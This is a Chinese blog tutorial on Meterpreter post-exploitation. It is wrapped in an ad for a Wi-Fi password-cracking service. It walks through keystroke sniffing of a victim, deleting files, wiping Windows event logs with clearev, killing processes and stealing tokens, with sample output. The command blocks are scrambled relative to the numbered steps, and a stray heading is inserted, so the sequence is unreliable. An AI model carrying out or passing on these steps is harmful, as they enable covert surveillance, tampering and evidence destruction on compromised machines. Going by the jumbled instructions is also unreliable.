linux控制Meterpreter

caocao3年前教程430

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

meterpreter > keyscan_start
Starting the keystroke sniffer…

Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。

Meterpreter包括的一些常见命令如下所示。

通过打开MSFCONSOLE实现控制。具体操作步骤如下所示。

(1)在MSFCONSOLE上启动一个活跃的会话。

(2)通过利用系统的用户启动登录键盘输入。执行命令如下所示:

meterpreter > keyscan_dump
Dumping captured keystrokes…
 www.baidu.com  aaaa      
meterpreter > keyscan_stop
Stopping the keystroke sniffer…

从输出的信息中可以看到键盘输入嗅探已启动。

(3)捕获漏洞系统用户的键盘输入。执行命令如下所示:

以上输出的信息表示在漏洞系统中用户输入了,aaaa及回车键、退出键。

(4)停止捕获漏洞系统用户的键盘输入。执行命令如下所示:

meterpreter > del exploited.docx
meterpreter > clearev
[*] Wiping 57 records from Application…
[*] Wiping 107 records from System…
[*] Wiping 0 records from Security…
kali怎么安装攻击指令

从输出的信息中可以看到键盘输入嗅探已停止。

(5)删除漏洞系统上的一个文件。执行命令如下所示:

(6)清除漏洞系统上的事件日志。执行命令如下所示:

(7)查看正在运行的进程列表。执行命令如下所示:

meterpreter > kill 2040
Killing: 2040
meterpreter > steal_token

输出的信息显示了漏洞系统中正在运行的所有进程,包括进程的ID号、进程名、系统架构、用户及运行程序的路径等。

(8)使用kill杀死漏洞系统中指定的进程号。执行命令如下所示:

(9)尝试从漏洞系统窃取一个假冒令牌。执行命令如下所示:

相关文章

联想笔记本z470无线网络无法开启(联想Z470无线网卡无法使用

联想笔记本z470无线网络无法开启(联想Z470无线网卡无法使用

联想Z470无线网卡无法使用的解决方法 如果您的联想Z470无线网卡无法使用,即使已经打开了硬件开关,您可以尝试以下方法进行恢复。 建议首先恢复BIOS出厂设置,具体操作如下: 进入BIOS设置界面...

网络安全与Kali Linux渗透:内网与局域网攻防实战技巧

网络安全与Kali Linux渗透:内网与局域网攻防实战技巧

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 本节课将教授如何使用AR...

kali_linux (install版)移动硬盘(物理机)安装记录

kali_linux (install版)移动硬盘(物理机)安装记录

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 时间:2023.04.2...

用docker搭建的Vulfocus镜像管理界面没有镜像可以拉取解决办法

用docker搭建的Vulfocus镜像管理界面没有镜像可以拉取解决办法

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 使用docker搭建的V...